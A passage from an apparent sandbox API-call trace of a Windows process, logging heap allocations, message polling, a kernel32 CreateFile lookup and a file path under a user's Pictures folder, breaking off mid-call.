out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.868] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.868] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.868] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.868] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.869] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.871] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.874] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c790 [0040.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c790, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.874] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0040.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.874] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0040.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x48) returned 0x88e138 [0040.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", cchWideChar=72, lpMultiByteStr=0x88e138, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", 